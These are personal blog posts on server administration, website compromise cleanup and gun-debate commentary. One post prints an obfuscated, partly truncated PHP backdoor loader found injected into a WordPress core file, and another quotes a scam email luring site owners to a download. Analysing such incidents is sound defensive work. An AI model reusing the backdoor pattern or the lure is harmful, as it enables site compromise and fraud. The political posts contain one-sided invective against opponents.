Quote of the Day – Ry Jones (2/24/2014)

In WireShark I trust.

There is no evidence to support that claim.

Ry Jones
February 24th, 2014

[Yup.  As a geek this kicked over my giggle box.  Doubly so since I've been in that same position.

Well I don't care what you say, WireShark shows no traffic related to X when your process is running.  So your crap's broken, deal with it!

I've noticed it is a unique individual who will just willingly admit, "Yup, I screwed up, give me a couple minutes so I can fix that."  Most of the time people are more interested in saving face and not looking bad.

I find it better to look good by admitting my mistake and fixing the problem, but that's just me.  -B]

This made me laugh…

I was about to just straight up bit bucket this thing but decided to at least take a look since all I saw was the name when I glanced on my phone.  I’m glad I did because I needed a good laugh.

From: Amy <[email protected]>
Subject: ATTENTION the-minuteman.org OWNER!!!

Message Body:
Hello the-minuteman.org owner,

My name is Amy and I am a private investigator with 20 years of experience. PLEASE READ THIS MESSAGE SERIOUSLY! While browsing the internet just now, I found out there are some people talking BAD about your website the-minuteman.org at a few online forums and Facebook groups. They are creating Bad Reputation about your website the-minuteman.org! They even say the-minuteman.org is a big liar and many people had believed them!

I decided to capture some screen shots of their activities and make it into a FREE report for you.

Please download the report that I made for your website the-minuteman.org here : [link removed for safety]

Your contact form does not allow file upload, so I uploaded it into a free file hosting site called cleanfiles.net, they host files for free so you are required to complete a short survey before downloading your report.

Take a look into this matter RIGHT NOW! Download your report here : [link removed for safety]

P/S: I am just trying to help. If you DON’T CARE about your REPUTATION you can ignore my message.


This mail is sent via contact form on The Minuteman http://www.the-minuteman.org

Obviously you’re not familiar with me or this website.  I am well known and take pleasure in the idea that some people hate me.  I’m well aware of people writing bad things about me on the internet.  I just make sure when I find it I return the favor.

I’m reasonably sure, Amy, that my reputation with those I actually respect is quite intact.  In the words of Winston Churchill:

You have enemies? Good. That means you’ve stood up for something, sometime in your life.

Thanks for confirming I’ve done my job.

Quote of the Day – Me* (6/12/2013)

Good lord, that’s a lot of porn.  How could the NSA categorize it and make sure they have everyone’s kinks right?

Barron – Conversation

June 12th, 2013

[For context, I read this article this morning, which had this note in it:

Considering that, according to Cisco, the total world Internet traffic for 2012 was 1.1 exabytes per day…

My immediate thought was that was a whole lot of porn and bitching across the internet.  Then someone asked me why I said wow, to which I informed them of the 1.1 exabyte estimate and immediately followed it with the quote above… It seemed the prudent comment to make.

If you don’t understand why I would think that would be a prudent comment to make, I give you:


*It’s my blog and I can quote myself if I damn well please!]

Zombies are Real and Infectious…


That is, of course, unless you supply a couple of well-placed rounds to the upper cranial cavity once you discover their plight.

Let me start at the beginning.  Over the past month I’ve been busy polishing the rough edges of my new VPS.  I’ve spent a lot of time securing it and going through everything I can to give myself the best probability of survival when the inevitable finally happens.

Last weekend I migrated Linoge and Weer’d over to the new server as well since I had finished hammering out the last of the kinks with the help of the LiquidWeb support team.

I moved Linoge over and had a few minor oddities which I quickly fixed and took care of.  From there I set my sights on moving Weer’d.

I logged in, dumped the database, and tar’d up the site.  The tar fails.  Odd, what do you mean you couldn’t read that file?  I didn’t think much of it, found the file, and, odd, the permissions are 000.  This isn’t my site though, and I’m not sure if something special was done, so I fix it.  In total I fix 8 files like this.  I move the site over and get him set up on the new server.  It actually went even smoother than Linoge’s move and didn’t require a weird step.
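A quick way to catch those unreadable files before tar chokes on them, sketched here in a scratch directory rather than the real site root (file name is made up):

```shell
# Simulate one of the mode-000 files the tar run tripped over,
# then find and repair it the same way I did on the live site.
site=$(mktemp -d)
touch "$site/wp-blob.php"
chmod 000 "$site/wp-blob.php"

find "$site" -type f -perm 000                        # lists the unreadable file
find "$site" -type f -perm 000 -exec chmod 644 {} \;  # restore sane permissions
find "$site" -type f -perm 000 | wc -l                # now finds nothing
```

Running the first find before the dump would have flagged all 8 files up front instead of letting tar discover them one error at a time.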

Fast forward 24 hours to when I begin my evening log check.  I run tail /var/log/messages.  What I see does not provide me comfort.

May  5 22:34:06 clark suhosin[26061]: ALERT – script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker '', file '/home/weerd/public_html/wp-includes/post-template.php', line 694)

May  5 22:34:06 clark suhosin[26061]: ALERT – script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker '', file '/home/weerd/public_html/wp-includes/post-template.php', line 694)

What!?  I promptly dump open that file and am greeted by the following:


/**
 * Applies custom filter.
 *
 * @since 0.71
 *
 * $text string to apply the filter
 * @return string
 */
function applyfilter($text=null) {

  if($text) @ob_start();

  if(1){global $O10O1OO1O;$O10O1OO1O=create_function('$s,$k',"\44\163\75\165\162\154\144\145\143\157\144\145\50\44\163\51\73\40\44\164\141\162\147\145\164\75\47\47\73\44\123\75\47\41\43\44\45\46\50\51\52\53\54\55\……………\164\56\75\44\143\150\141\162\73\40\175\40\162\145\164\165\162\156\40\44\164\141\162\147\145\164\73"); if(!function_exists("O01100llO")){function O01100llO(){global $O10O1OO1O;return call_user_func($O10O1OO1O,'od%2bY8%23%24%3fMA%2aM%5dnjjMjBBPP%3eF%27VzBPp%5ez1h%27%27hIm%2bKKbC0XJ%5e%3b%60%40Bd44d%22%2eULLtT1MMZf%3eZSRt%22%2a%2a0y%5cjj%291%………………….%3eBhG%27%7dl',6274);}call_user_func(create_function('',"\x65\x76\x61l(\x4F01100llO());"));}}

  if($text) {$out=@ob_get_contents(); @ob_end_clean(); return $text.$out;}

Now, for those who may not realize it, that odd text in there I immediately recognized as obfuscated code… that was in the middle of a standard WordPress installation.  Das Not Good.  I promptly shifted into Defcon 2; the good news was the IP in the log was Google crawling the site.  I bumped an email to Weer’d along with everyone else about this new Charlie Foxtrot.
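For the curious, those backslash-and-digit runs are nothing exotic: they are octal character escapes, which PHP expands inside double-quoted strings. printf decodes them the same way, and the opening bytes of the blob above turn out to be a perfectly ordinary assignment:

```shell
# Decode the first escapes from the create_function() payload above.
# \44 = '$', \163 = 's', \75 = '=', and so on.
printf '\44\163\75\165\162\154\144\145\143\157\144\145\50\44\163\51\73\n'
```

That prints `$s=urldecode($s);`, i.e. the start of the decoder stub that unpacks the rest of the payload at runtime.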

I have no idea how severe this incident is; at this point I trust absolutely no one.  My first order of business is to close the hole that I can now see.  I manually reinstall WordPress, overwriting ALL the existing files on the server.  This promptly stops those messages in my log.  Something new happens though.

Weer’d has the WordFence security plugin (fantastic plugin, and I highly suggest it), so I run a scan; it says nothing is wrong.  I call BS.  There is no way that’s it.  I do a diff with another site that is known good and discover a pile of files.


There’s the list in a little more file-friendly form.  I promptly removed and reinstalled the WordFence plugin.  This is where things get interesting.  I see this in the scan output:

Mon, 06 May 13 02:45:03 +0000::1367822703.7602:2:info::Adding issue: This file appears to be an attack shell

Mon, 06 May 13 02:45:03 +0000::1367822703.7594:2:info::Adding issue: This file appears to be an attack shell

And I had to keep running the scan over and over.  I finally just resort to nuking everything, double-checking from a shell, and then reinstalling what I actually want to keep.  Overall this is very little.  Every time I run a scan after fixing something I find something new.  Eventually I discover that the theme has been compromised.  Dump the theme and replace it.  In the end there were stock WordPress files that had been compromised, along with additional files that were added but made to look legitimate.
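The diff against a known-good tree is the workhorse here. A minimal sketch of the technique in scratch directories (real paths, and the planted file name, are made up for the demo):

```shell
# Two trees: a "clean" copy and a "suspect" copy with one extra file.
# diff -rq only reports which files differ or are missing, without
# dumping their contents, which is exactly what you want for triage.
good=$(mktemp -d); suspect=$(mktemp -d)
echo '<?php // core file' > "$good/index.php"
cp "$good/index.php" "$suspect/index.php"
echo '<?php evil();' > "$suspect/shell.php"   # planted file the clean tree lacks

diff -rq "$good" "$suspect" || true           # reports: Only in ...: shell.php
```

Against a fresh download of the same WordPress version, every "Only in" and "differ" line is a file to eyeball.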

After a short while I had the site cleaned up.  I will do a more thorough cleaning, but that was the immediate action remedy for BF 30 in the AM Sunday night.

I do however want to investigate the details of this.  I log in to the old server and start looking around.  All the exploits are still present, so that means it was prior to the move, and then I look at the root directory:


Do you see it?  Here’s the dump of what’s inside:


Now if you pay close attention you can glean a few important facts from the above.  First, they had multiple exploits to get back in.  Second, they obtained root access on the box.  In hindsight I noticed a few things (other than the interesting file name that should have been a giant fucking red flag) such as .bash_history not working correctly.  Lastly, we can note the date of the last edit: October 5th, 2012.
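That October 5th date came straight from the file's modification time, and mtimes are worth checking because sloppy intruders rarely bother to reset them. A scratch-file sketch of the check (GNU touch/stat assumed, i.e. a Linux box):

```shell
# Fake a file with an old mtime the way the dropped exploit looked,
# then read the timestamp back; on the real box this is what dated
# the compromise.
f=$(mktemp)
touch -d '2012-10-05 12:00:00' "$f"   # simulate the old modification time
stat -c '%y' "$f"                      # prints the 2012-10-05 timestamp
```

Worth remembering the inverse too: a careful attacker can forge mtimes with exactly this touch trick, so the date is a clue, not proof.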

There’s a reason that rang a bell with me.  From an article dated Oct 3, 2012:

The distributed denial-of-service (DDoS) attacks—which over the past two weeks also caused disruptions at JP Morgan Chase, Wells Fargo, US Bancorp, Citigroup, and PNC Bank—were waged by hundreds of compromised servers. Some were hijacked to run a relatively new attack tool known as "itsoknoproblembro." When combined, the above-average bandwidth possessed by each server created peak floods exceeding 60 gigabits per second.

More unusually, the attacks also employed a rapidly changing array of methods to maximize the effects of this torrent of data. The uncommon ability of the attackers to simultaneously saturate routers, bank servers, and the applications they run—and to then recalibrate their attack traffic depending on the results achieved—had the effect of temporarily overwhelming the targets.

It appears I found a zombie that was sleeping in my friends place and inadvertently moved him.  That’s OK though, upon finding him I filled him full of 00 Buck Shot and did a mag dump from the AR for good measure.  I will also be killing the entire area with fire here when I get a bit more free time.

My actions though are leaps and bounds beyond what Dreamhost is doing, and remember, they’re the ones who actually suffered a data breach and have a server where root was compromised.

Thank you for writing.  Let us assure you that you’re not on your own!  We’re here to guide you through this process as much as we possibly can.  By the time you’re reading this email we have attempted to clean some basic rudimentary hacks out of your account and fix any open permissions; any actions taken will be noted below.
Going forward, we need you to take care of some basic site maintenance steps to ensure that your account has been secured.  To get started, please read and act on all of the information in the email below.  Since it involves editing and potentially deleting data under your users we are not able to complete all tasks for you.  If you have questions about the noted items please provide as much information and detail as possible about where you are getting stuck and we will do our best to assist you.
Here’s another area where we’re able to help — if you would like us to scan your account again for vulnerabilities after you have completed some or all of the steps below, please reply to this email and request a rescan and we can then verify your progress or if there are any lingering issues.
Most commonly hacking exploits occur through known vulnerabilities in outdated copies of web software (blogs, galleries, carts, wikis, forums, CMS scripts, etc.) running under your domains.  To secure your sites you should:
1) Update all pre-packaged web software to the most recent versions available from the vendor.  The following site can help you determine if you’re running a vulnerable version:
– Any old/outdated/archive installations that you do not intend to maintain need to be deleted from the server.
You should check any other domains (if applicable) for vulnerable software as well, as one domain being exploited could result in all domains under that user being exploited due to the shared permissions and home directory.
2) Remove ALL third-party plugins/themes/templates/components after upgrading your software installations, and from those that are already upgraded under an infected user.  After everything is removed, reinstall only the ones you need from fresh/clean downloads via a trusted source.  These files typically persist through a version upgrade and can carry hacked code with them.  Also, many software packages come with loads of extra content you don’t actually use and make searching for malicious content even harder.
3) Review other suspicious files under affected users/domains for potential malicious injections or hacker shells.  Eyeballing your directories for strangely named files, and reviewing recently-modified files can help.  The following shell command will search for files modified within the last 3 days, except for files within your Maildir and logs directories.  You can change the number to change the number of days, and add additional grep exception pipes as well to fine-tune your search (for example if you’re getting a lot of CMS cache results that are cluttering the output).
find . -type f -mtime -3 | grep -v "/Maildir/" | grep -v "/logs/"
In scanning your weerd user we found 3 hacked files that we were able to try and clean.  Backups of the original hacked files can be found at /home/weerd/INFECTED_BACKUP_1367876582 under your user, with a full list of the original files at /home/weerd/INFECTED_BACKUP_1367876582/cleaned_file_list.txt.  You should verify that your site is working fully after being cleaned and then delete the INFECTED_BACKUP directory fully.
Likely hacked code / hacker shells that we could not automatically clean were found under weerd here:
Likely hacked code / hacker shells that we could not automatically clean were found under jp556 here:
For information specific to WordPress hacks please see:
More information on this topic is available at the following URL under the "CGI Hack" and "Cleaning Up" sections:

Seriously… A shared hosting server, not a VPS mind you, where there is evidence of a shell compromise that resulted in Root access and your response is, “Here we’ll help you remove the malicious code from your site.”  Uh, already done that sparky but the bad news is that’s like closing the barn door after the cow has gotten out.  Or more specifically closing the front door and locking it after the serial killer has gotten into your house.  You really think those guys didn’t create backdoors in other sites? 

The real reason we were informing you is that you have a breach which placed everyone who has data on that server in danger.  I’m root; I can just go and place whatever exploit I want in whoever’s code I want.  I don’t think you understand why I had Linoge contact you, boy genius.

Yes, I understand you want to look good and not like a complete idiot in front of your customers.  You know what though: “Pride goes before destruction, a haughty spirit before a fall.”  I was informing you because this is serious, and at least an acknowledgement of “thank you, we will get right on that” would be smart.  Try having to deal with constant outages and not being sure exactly why it’s happening.  It sucks; every time something goes wrong I think my forehead gets flatter from my desk.  Luckily at this point I think it’s solved, and today’s was a bit of an odd duck that only affected one site, but I digress.

Linoge informed me his server issues started late last September/early October and have continued right up to today.  Well I’m sorry but we have heavy signs of enemy action and that is no coincidence.  That server is most likely still compromised at the root level and it appears Dreamhost has no interest in fixing it.  With a shared host your attack surface area is much larger and your odds of compromise increase.  So does the damage from a root compromise.

So remember folks, digital zombies exist, they are contagious if you’re not careful, and they are best dealt with using a serious dose of heavy metal poisoning followed by a tactical nuke to the general vicinity.  Be very careful too; sites you may think are safe may have actually been compromised.  Now hopefully I can get all the other stuff I’m trying to get done and finally get some sleep.  Constant 0200 bedtimes with 0630 rise times are eating me whole.

How I know I moved to the right host

There have been teething issues over the past week.  I’m still working out a lot of the kinks, but there was a relatively big incident last Friday.  Let me just let my hosting provider give the overview of what happened, the analysis, and their corrective actions.

Dear Customer,

Earlier today, we had to perform emergency maintenance on a critical piece of power infrastructure. Our customers’ uptime is of critical importance to us and communication during these events is paramount.  At this time, power has been restored and servers are back online. Listed below is a timeline of events, record of ongoing communications, SLA compensation information and a detailed outline of the steps we’re taking to prevent against these issues in the future. If at anytime you have any questions please do not hesitate to call, email or chat.

Timeline of Events:

  • 11:00 – During a routine check of the data center by our Maintenance staff, the slight odor of smoke was detected. We immediately began a complete investigation and located the source of the smell; a power distribution unit in Liquid Web DC3, Zone B, Section 8 covering rows 10 & 11.
  • 11:05 – We discovered a manufacturer defect in the Power Distribution Unit (PDU).  This defect resulted in a high resistance connection which heated up to critical levels, and threatened to seriously damage itself and surrounding equipment.  This bad connection fed an electrical distribution panel which powers one row (Lansing Region, Zone B, Section 8, Row 11)  of servers which is part of our Storm platform.  We immediately tried to resolve the issue by tightening the connection while the equipment was still on, but it wasn’t possible. To properly resolve the situation and repair the equipment, we needed to de-energize the PDU to replace an electrical circuit breaker.
  • 11:15 – To avert any additional damage, we were forced to turn off the breaker which powered servers in Lansing Region, Zone B, Section 8, Row 11. All servers were shut down at this time.
  • 11:48 – Servers in Lansing Region, Zone B, Section 8, Row 10 began to be shut down.
  • 11:49 – Once it was safe to begin the work, we immediately removed the failed components and replaced them with spares.  We discovered that the failed connection was due to a cross threaded screw installed at the time of manufacture.  This cross threaded screw meant the connection wasn’t tightened fully, and resulted in a loose, high resistance connection which heated far beyond normal levels. Upon replacing the breaker, we re-energized the PDU and customer servers.  Our networking and system restore teams have been working to ensure every customer comes back online as soon as possible.
  • 12:52 – Power was restored and servers began to be powered back on.

Communication During Event

We know that in the event of an outage, communication is of critical importance.  As soon as the issues were identified we provided the following updates on the Support Page and an “Event” which emails the customer as well as provides an alert within the manage.liquidweb.com interface.

Event Notice on Support Page:

“We are currently undergoing emergency maintenance on critical power infrastructure affecting a small number of Storm servers in Zone B. Work is expected to take approximately 2 hours. During this event affected instances will be powered down. We apologize for the inconvenience this will cause. An update will be provided upon completion. “

Event Notice Emailed to Customers:

“We are currently undergoing emergency maintenance on critical power infrastructure affecting 1 or more of your Storm instances. Work is expected to take approximately 2 hours. During this event affected instances will be powered down. We apologize for the inconvenience this will cause. An update will be provided upon completion.”

SLA Compensation

Liquid Web’s Service Level Agreement (SLA) provides customers the guarantee that in the event of an outage the customer will receive a credit for 10 times (1,000%) the actual amount of downtime. From our initial research into this event it appears as though most customers experienced between 1 hour and 2 hours of downtime.  However, due to the disruptive nature of this event we are providing a minimum of 1 full day of SLA coverage for any servers that were affected by this event.  Please contact support if you have any additional information regarding this event or if you would like to check on the status of your SLA request.

Liquid Web TOS Network SLA

Network SLA Remedy
In the event that Liquid Web does not meet this SLA, Dedicated Hosting clients will become eligible to request compensation for downtime reported by service monitoring logs. If Liquid Web is or is not directly responsible for causing the downtime, the customer will receive a credit for 10 times ( 1,000% ) the actual amount of downtime. This means that if your server is unreachable for 1 hour (beyond the 0.0% allowed), you will receive 10 hours of credit.

All requests for compensation must be received within 5 business days of the incident in question. The amount of compensation may not exceed the customer’s monthly recurring charge. This SLA does not apply for any month that the customer has been in breach of Liquid Web Terms of Service or if the account is in default of payment.

Moving forward

All PDU’s will be inspected for the same issue for all panels and all main breakers.

In this case, this PDU was just recently put into service.  When we purchase critical power equipment, the manufacturer performs an onsite startup procedure. This equipment check includes a physical inspection, phase rotation, voltage checks, alarm checks and many more.  This particular manufacturer defect didn’t avail itself until the PDU was under a significant amount of load.  Once the manufacturer defect began, the screw at the bus finger began to overheat. Once this overheating began, the resistance increased causing a serious risk of catastrophic failure.

Going forward, Liquid Web will perform additional tests, above and beyond our manufacturer startup procedures, on new equipment to look for manufacturer related defects and issues. We will now perform testing at full load by utilizing a Power Load Banking System.  This testing procedure was already in place for the vast majority of our power equipment but now will also include PDU specific testing.

Liquid Web performs preventative maintenance (PM) on all PDU’s.  This PM is an inspection that consists of current draw recording on all branch circuit breakers, infrared imaging of main connection points and on the transformers and a general inspection.  This is typically a quarterly inspection.

Yeah, I can’t argue with a company that honest.  Plus they go out of their way to help solve problems which technically may not even be their problem or responsibility. 

Oh, and I²R losses, as always, are a pain in the ass.
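For the non-EEs, that quip is the whole failure mode in one formula: power dissipated in a connection is P = I²R, so a bit of contact resistance that is harmless at idle cooks once the PDU is under full load, exactly as Liquid Web described. The numbers below are purely illustrative:

```shell
# A cross-threaded screw adds contact resistance; at data-center
# currents even tens of milliohms turn into serious heat.
I=100            # amps through the connection (illustrative)
R_mohm=50        # extra contact resistance in milliohms (illustrative)
P=$(( I * I * R_mohm / 1000 ))   # P = I^2 * R, in watts
echo "${P} watts dissipated at the connection"   # 500 watts
```

Note the square on I: doubling the load current quadruples the heat, which is why the defect only "availed itself" at significant load.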

0 to Attacked in No Time Flat

So as I’ve mentioned previously, I’ve moved to the world of a VPS, which for all intents and purposes is much like being self-hosted.  I used to do this stuff a long time ago; I still do it, but not nearly as intensively, and for the most part my shell-fu has gotten rusty.

I spent the first part of Saturday getting the server set up and figuring out WHM and cPanel, both unbelievably easy.  The biggest issue was making sure I had things locked down.  I had just set up this server though; who could possibly be attacking it?


Bandwidth usage since I turned on the server.

You can see where I turned the server on on the 13th.  Notice that big spike shortly thereafter; yeah, that was a huge influx of traffic.  It caused the server to grind to a halt.  At the time I thought it was related to me bringing up my site, since it locked up within minutes, and I had tweaked some server settings and thought that caused the instability.

Come Monday morning I have an email from A Girl saying she cannot get in, and two from the data center saying they rebooted the server after it ran out of memory and locked up.


System loading and availability since being turned on.

You can’t see it as well, except for the latest incident, in those images, but there is a serious proc-load spike when those bandwidth spikes occur.  I promptly switched from APF to CSF for my firewall so I could gain use of LFD.  I spent my time installing and configuring it last night.


The Proc Spike I had overnight.



A more detailed image of the bandwidth spikes.

There you can see the proc spike from an incident last night.  I did a few more tweaks to CSF and you can see things were better when they tried again about an hour later.  In the middle of all of this I also discovered that there is a way to have Apache watch all the wp-login pages for failed logins.  When they happen, block and ban the IP after numerous failed attempts.  This is why I called myHosting lazy and was so pissed about their approach to handling the problem.
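Before any blocking was in place, the quickest way to see a brute force like this is to tally wp-login.php POSTs per source IP in the Apache access log. Sketched here against a tiny fake combined-format log, since real log paths and formats vary by setup:

```shell
# Build a tiny fake Apache access log, then count login POSTs per IP.
log=$(mktemp)
cat > "$log" <<'EOF'
203.0.113.9 - - [15/Apr/2013:00:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 1234
203.0.113.9 - - [15/Apr/2013:00:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 1234
198.51.100.7 - - [15/Apr/2013:00:00:03 +0000] "GET /index.php HTTP/1.1" 200 512
EOF

# $6 is the quoted request method, $7 the path; print the client IP
# for each login POST, then count occurrences per IP, busiest first.
awk '$6 == "\"POST" && $7 == "/wp-login.php" {print $1}' "$log" \
    | sort | uniq -c | sort -rn
```

Any IP racking up hundreds of attempts a minute is a candidate for the ban hammer, and the counts give you a sane threshold for the mod_security rules.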

If you are a server administrator and want to protect against the WordPress brute force attack it is quite simple, doubly so if you have WHM.

Log in to WHM, go to Software > EasyApache.  Follow the onscreen instructions and rebuild Apache, but make sure the modsec2 module is selected.  Build Apache.

Once built, log in to your shell and edit /usr/local/apache/conf/modsec2.user.conf and add the following.

#Block WP logins with no referring URL
SecAction phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:5000210
<LocationMatch "/wp-login.php">
SecRule REQUEST_METHOD "POST" "deny,status:401,id:5000211,chain,msg:'wp-login request blocked, no referer'"
SecRule &HTTP_REFERER "@eq 0"
</LocationMatch>

#WordPress Brute Force detection
SecAction phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:5000212
<LocationMatch "/wp-login.php">
# Setup brute force detection.
# React if block flag has been set.
SecRule ip:bf_block "@gt 0" "deny,status:401,log,id:5000213,msg:'ip address blocked for 5 minutes, more than 10 login attempts in 3 minutes.'"
# Setup Tracking. On a successful login, a 302 redirect is performed, a 200 indicates login failed.
SecRule RESPONSE_STATUS "^302" "phase:5,t:none,nolog,pass,setvar:ip.bf_counter=0,id:5000214"
SecRule RESPONSE_STATUS "^200" "phase:5,chain,t:none,nolog,pass,setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180,id:5000215"
SecRule ip:bf_counter "@gt 10" "t:none,setvar:ip.bf_block=1,expirevar:ip.bf_block=300,setvar:ip.bf_counter=0"
</LocationMatch>

Save the file and restart Apache.  This will help stop the brute force attacks.  If it wasn’t for the off chance of false positives, I’d be good with a perma-ban and dropping that axe like a rock….

Funny story, I dropped that !@#$ing ax on myself tonight.  Most of the other services are watched by LFD and when you get multiple login failures, it drops the ax and hard.  I screwed up logging in and paid the price.  I was just going along minding my own business and tried to login a couple times with the wrong password and bam there I am behind a curtain with some asshole molesting my balls.  Man, when I describe it like that it sounds like my intrusion detection system works for the TSA.

In the meantime the folks I got the VPS from (they’ve been fantastic support-wise, unlike that previous host) are looking into trying to figure out what’s causing the load spikes.  The bummer is it happens randomly, so it’s a pain to catch in the act.  The good news is the server has actually survived the past couple slams, so it’s almost there.  Security-wise it isn’t a concern; it’s just an issue with service.

It’s a Weird Feeling

Through my online travels I’ve ended up meeting and getting to know a lot of people in digital space.  Most of these people I would have never met otherwise and due to the nature of the online relationship I know more about them than many people I do know in meat-space.

So it’s a weird feeling thinking of someone as a friend that honestly I’ve never actually met in meat-space.  I’ve got plenty of them, including a bunch I have also met in meat-space, but the saddest most helpless feeling is seeing one of my friends in trouble, with not a damn thing I can do.  Especially when it drags on in a manner that doesn’t seem to end.

As another one of my friends said:

She’s going to be just fine. I mean really, whose side do you want to be on? Tam’s or cancer’s?

I’m betting on Tam.

Jennifer is right, Tam will be fine.  It did however remind me of something that has been discussed before.  The wonder that is the internet and the expansion and alterations to the boundaries of our “tribes”.

There are many who wouldn’t have moved into my circle of friends if it hadn’t been for this invention known as the internet.  It’s nice having it here though because even in the middle of this whole mess I’m reminded of why I love this community and why I’m so glad to be a part of it.

Go give Tam some words of support.  One of these days I’ll finally get to meet her; I’ve got some other friends who have met her and have had nothing but nice things to say about her personality in meat-space.

Quote of the Day – Jennifer Hast (1/22/2013)

I’ll not rejoice if your delusions come crashing down.  I’ll not celebrate the day you discover that evil comes in many forms and will use any tool available. I hope that day never comes. Truly, I hope you live out all of your days in blissful ignorance and die peacefully in your old age.

Jennifer – I’ll Not Rejoice
January 21st, 2013

[Honestly, go read her post; it is something that many of us on this side of the debate have encountered all too often recently.  We all know that anti-rights cultists are violent and downright despicable in what they say and how they act.  If you're on the other side of the debate, think long and hard about the actions and words of your fellow supporters.

It is the only way they can debate and appear to be winning: be so downright mean and vicious that the people on the other end want nothing to do with them.  I haven't been as active on the Twitter front lately because honestly, the crap gets old, and most of them have absolutely no interest in an actual conversation.  They want to lecture us.

I did however have a nice conversation with a friend from high school recently on Facebook, and my patience continued mainly because of the ties she had with my family growing up.  Honestly though, I think it's those ties more than anything that helped facilitate a civil discussion and a willingness to listen to the other side of the debate.  That's the biggest issue right now: no one really wants to listen; they have their preconceived answers and are not even willing to be polite and hear the other side out.

The thing is, one side of this debate is listening and responding (for the most part; there are some who aren't), but the problem is the response more often than not is the opposite of what those on the other side want to hear.  As Joe said, we need an accurate problem statement.  No one though has even bothered to try to create one; instead they throw out solutions, solutions that in many cases don't actually solve any problems relating to what the proponents claim.  When people rebuke their solution they are played down, diminished, called names, and have violence wished upon them for a difference of opinion.

It does not help your position to behave in such a manner, and to the many watching it indicates a lack of maturity and an inability to support your position.  I am flattered by the comments that Garand Gal made about Linoge, Sean, Erin, and me.  But please don't feel like you have to support us.  Is it nice?  You bet; fire support is a wonderful thing, especially when viciousness like that starts getting thrown around.  It's good to see a friendly face, and it does give you that extra sense of, yes, this is worth it.  But, and this is a big but, often it is emotionally draining and tiring.  In the end it's nothing more than wrestling with a pig: sure, you may think you win, but the pig just wanted you covered in mud.

If you feel it's worth it to spend time discussing with someone, by all means do so, and if you see a reasonable discussion going on, by all means chip in; just don't be a dick, and let them do it on their own if they're going to.  The time spent chatting with my family friend paid off; she's no longer focused on the tool and can see from this side of the debate.  There are a few other things still to work out, but it's a start, and a good one at that.  Sadly she's not physically close, otherwise I could more easily go hands-on.  It turns out there were some people who made very poor decisions regarding firearms around her while in college, and it gave her a very negative view of gun owners.

Pick and choose your battles and work where you think you can gain the most ground if you're going to spend a lot of time on it.  Last week a particular individual kept wasting my time and running in circles.  I kept trying to escape the conversation but she kept dragging me back.  Finally, after she called me an extremist for not wanting to be lectured, I asked to be dropped from the conversation.  She did, for about 30 minutes, and then mentioned me in another tweet.  I went off, ripped apart her argument again, and then said leave me the hell alone.  She tweeted me again; this time it wasn't falsehoods or lies, just general antagonism, so I ignored it.  Yesterday morning her account was evidently suspended.

Let me say right here, right now: I had nothing to do with it.  I didn't report her; I didn't even block her.  I do however have a strong feeling, given her behavior, that she went down the same road as the individual debating with Jennifer.  In so doing I'm reasonably sure she used some not-so-nice words and possibly made threats towards someone's safety.  Honestly, that woman wasn't worth my time at all beyond illustrating to the world how dumb her idea was for "smart guns".  Pick and choose your battles wisely and do your best not to get sucked in, because you have to constantly fight their lies; that's what they do, spout lies and drivel so you come back with facts.  Sometimes it's just not worth it.  Overall though, in the grand scheme, this fight is most definitely worth it, and the effort of debate is a small price to pay. -B]